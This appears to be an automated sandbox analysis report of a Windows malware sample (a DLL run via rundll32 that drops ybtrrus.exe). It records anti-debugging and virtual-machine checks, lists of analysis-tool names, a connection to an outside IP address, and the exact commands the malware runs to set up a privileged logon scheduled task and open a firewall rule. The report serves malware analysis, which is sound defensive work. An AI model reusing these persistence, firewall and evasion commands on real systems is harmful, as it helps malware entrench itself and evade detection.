Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: OLLYDBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: X64DBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: REGMON.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: WINDBG.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: AUTORUNS.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: IMPORTREC.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PETOOLS.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: FIDDLER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: PROC_ANALYZER.EXE
Source: ybtrrus.exe	Binary or memory string: JOEBOXCONTROL.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: IDAQ.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: DUMPCAP.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: WIRESHARK.EXE
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: FILEMON.EXE

Found evasive API chain checking for process token information

Source: C:\iDQiPwFWUp\ybtrrus.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.6 %
Source: C:\iDQiPwFWUp\ybtrrus.exe	API coverage: 5.5 %

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\iDQiPwFWUp\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\pnVcakKiqh\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C831F00 CloseHandle,memset,FindFirstFileW,FindClose,	12_2_6C831F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8316F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,	12_2_6C8316F0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4C2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,	28_2_6FE4C2D0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545FB74 FindFirstFileW,FindClose,	28_2_0545FB74
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545F590 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	28_2_0545F590
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05467CC6 FindFirstFileW,	28_2_05467CC6

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467DCE GetLogicalDriveStringsW,

28_2_05467DCE

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C81EE1C GetSystemInfo,CreateFileMappingW,MapViewOfFile,VirtualAlloc,VirtualFree,UnmapViewOfFile,CloseHandle,CloseHandle,

12_2_6C81EE1C

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\	Jump to behavior

Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P@
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOy6B
Source: rundll32.exe, 0000000C.00000003.1660572027.000000000311E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1660600474.000000000311F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1879646428.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1879973902.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.1907789649.0000000003120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: rundll32.exe, 00000013.00000003.1712424926.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1712264584.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1962392544.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1705368888.000000000305F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1933713755.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1705289741.000000000305E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: ybtrrus.exe, 0000002F.00000002.2123620807.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0101a.zip.12.dr	Binary or memory string: x3HgFs
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: 4HGFs

Source: C:\iDQiPwFWUp\ybtrrus.exe

API call chain: ExitProcess graph end node

Source: C:\iDQiPwFWUp\ybtrrus.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C85599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6C85599F

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C6927E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_6C6927E0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C85BA00 GetProcessHeap,HeapAlloc,

12_2_6C85BA00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C85599F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6C85599F
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE59D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_6FE59D73
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE613E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	28_2_6FE613E1
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE5F0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_6FE5F0D4

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 147.45.116.5 80

Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05D5F500 ShellExecuteW,

28_2_05D5F500

Contains functionality to simulate keystroke presses

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468F7E keybd_event,

28_2_05468F7E

Contains functionality to simulate mouse events

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468F86 mouse_event,

28_2_05468F86

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"	Jump to behavior
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager!$
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerA"\|
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager!$\|
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managerq"\|
Source: ybtrrus.exe, 00000021.00000002.2697436058.000000000927B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager'X
Source: ybtrrus.exe, 0000001C.00000002.2695219573.000000000941B000.00000004.00000010.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2697436058.000000000927B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: )Program Manager Chromexe)nWindowClass.0
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005FC5000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000060D5000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.0000000005FAA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWndStartU
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005E66000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.0000000005F76000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.0000000005FAA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32U
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managerq"
Source: ybtrrus.exe, 0000001C.00000002.2691639077.000000000778E000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.000000000775E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROGRAM MANAGERATIONAREAICONWINDOWCLASS.0
Source: ybtrrus.exe, 0000001C.00000002.2695219573.000000000941B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerration Wizard
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ!\|
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager1#
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager1
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005E66000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000001C.00000002.2657419183.0000000005FC5000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000060D5000.00000020.00000001.01000000.0000000D.sdmp	Binary or memory string: Shell_TrayWndU

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C819920 cpuid

12_2_6C819920

Contains functionality to query locales information (e.g. system language)

Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetLocaleInfoA,	28_2_6FE62D4C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	28_2_0545FCCC
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	28_2_0545FCCA
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	28_2_0545F12C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	28_2_0545F128
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetLocaleInfoW,	28_2_05467DC6
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetLocaleInfoW,	28_2_05467DBE
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: EnumSystemLocalesW,	28_2_05467C86

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp\0101a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp\0101a_decrypted.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh\0101a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh\0101a_decrypted.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C8555EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_6C8555EE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467ACE GetUserNameA,

28_2_05467ACE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467EFE GetTimeZoneInformation,

28_2_05467EFE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_6FE6070D InitializeCriticalSectionAndSpinCount,GetVersion,

28_2_6FE6070D

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\iDQiPwFWUp\ybtrrus.exe

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any

AV process strings found (often used to terminate AV products)

Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: procmon.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: tcpview.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: Wireshark.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: procexp.exe
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000F25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: LordPE.exe
